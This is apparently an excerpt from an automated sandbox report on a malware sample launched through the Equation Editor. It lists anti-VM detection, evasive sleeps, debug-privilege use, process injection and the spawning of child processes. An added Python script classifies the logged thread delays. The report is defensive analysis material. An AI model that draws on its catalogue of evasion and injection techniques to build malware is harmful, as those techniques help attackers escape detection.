Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1944 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2804 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2280 Thread sleep count: 193 > 30
Source: C:\Users\Public\vbc.exe TID: 1944 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2540 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2688 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904 Thread sleep count: 8354 > 30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2904 Thread sleep count: 1010 > 30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2608 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2816 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe TID: 2572 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2120 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1408 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2060 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1312 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1016 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 3008 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 832 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 604 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2792 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1304 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1452 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 1612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe TID: 2224 Thread sleep time: -60000s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Window / User API: threadDelayed 8354
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Window / User API: threadDelayed 1010
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Window / User API: threadDelayed 7559
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Window / User API: threadDelayed 1957
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Window / User API: foregroundWindowGot 386
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477
Source: sys30.exe, 00000007.00000002.698161367.0000000006149000.00000004.00000001.sdmp Binary or memory string: VMware_S
Source: sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
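
The delay value on every "Thread delayed" line above, 922337203685477, is not an arbitrary long sleep. It is 2^63 hundred-nanosecond units converted to milliseconds, the largest timeout the Windows kernel can express, which is how an INFINITE wait appears once the logged interval is turned into milliseconds; the threads are parked indefinitely rather than sleeping for a fixed period that a sandbox could skip over. The Python below is an added example and not part of the Joe Sandbox report: it classifies "Thread delayed" evidence lines into infinite parks, finite long sleeps (the report's 3 minute threshold) and short delays, and summarises them per image. Three sample lines are copied from the report; the 300000 ms line is constructed for illustration.

```python
import re
from typing import Dict, List, NamedTuple

# 2**63 hundred-nanosecond units expressed in whole milliseconds = 922337203685477.
# This is the magnitude of the INFINITE timeout (0x8000000000000000) that Sleep(INFINITE)
# and equivalent waits hand to the kernel, so a delay equal to it marks a parked thread,
# not a timed evasion sleep.
INFINITE_WAIT_MS = 2**63 // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's ">= 3 min" threshold

DELAY_RE = re.compile(r"^Source: (?P<image>.+?) Thread delayed: delay time: (?P<ms>\d+)")


class Delay(NamedTuple):
    image: str
    ms: int
    kind: str  # "infinite", "long" or "short"


def classify_delay(ms: int) -> str:
    """Bucket a logged delay the way an analyst reads it."""
    if ms >= INFINITE_WAIT_MS:
        return "infinite"
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def parse_delays(lines: List[str]) -> List[Delay]:
    out = []
    for line in lines:
        m = DELAY_RE.match(line.strip())
        if m:
            ms = int(m.group("ms"))
            out.append(Delay(m.group("image"), ms, classify_delay(ms)))
    return out


def summarize(delays: List[Delay]) -> Dict[str, Dict[str, int]]:
    """Per image: threads parked forever, finite long sleeps, and the largest finite
    delay in ms (the value a sleep-skipping sandbox actually has to cover)."""
    summary: Dict[str, Dict[str, int]] = {}
    for d in delays:
        s = summary.setdefault(d.image, {"infinite": 0, "long": 0, "max_finite_ms": 0})
        if d.kind == "infinite":
            s["infinite"] += 1
        else:
            if d.kind == "long":
                s["long"] += 1
            s["max_finite_ms"] = max(s["max_finite_ms"], d.ms)
    return summary


# Three lines copied from the report plus one constructed finite 5-minute sleep
# (the 300000 ms line is made up for illustration and does not appear in the report).
SAMPLE_LINES = [
    r"Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Thread delayed: delay time: 300000",
]

if __name__ == "__main__":
    for image, stats in summarize(parse_delays(SAMPLE_LINES)).items():
        print(f"{image}: {stats}")
```

Only the finite bucket tells you how far a sandbox's sleep acceleration must reach; the infinite parks are background threads (waits, timers) that will never wake on their own and should not be counted as a stalling technique.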

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Memory written: C:\Users\user\AppData\Local\sys4h57g\sys30.exe base: 70000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
